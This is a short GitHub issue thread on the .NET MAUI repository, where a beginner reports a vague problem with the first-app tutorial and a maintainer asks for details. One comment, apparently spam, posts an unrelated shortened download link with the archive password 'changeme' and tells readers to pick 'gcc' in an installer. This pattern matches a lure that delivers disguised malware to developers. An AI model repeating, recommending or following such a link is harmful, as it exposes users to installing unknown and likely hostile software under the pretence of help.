### ISSUE TITLE
Vianney app

### ISSUE THREAD

**Issue by Baracus361** [dotnet/maui#24475]
Problem application 
on https://dotnet.microsoft.com/en-us/learn/maui/first-app-tutorial/create
Operating System: windows

Provide details about the problem you're experiencing. Include your operating system version, exact error message, code sample, and anything else that is relevant.

**Comment by Baracus361** [comment]
J'aimerais créer une application

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by jaosnz-rep** [comment]
@Baracus361 What's the specific problem you are encountering? To facilitate our investigation, you can provide us with screenshot, video or sample project. Looking forward to your reply!
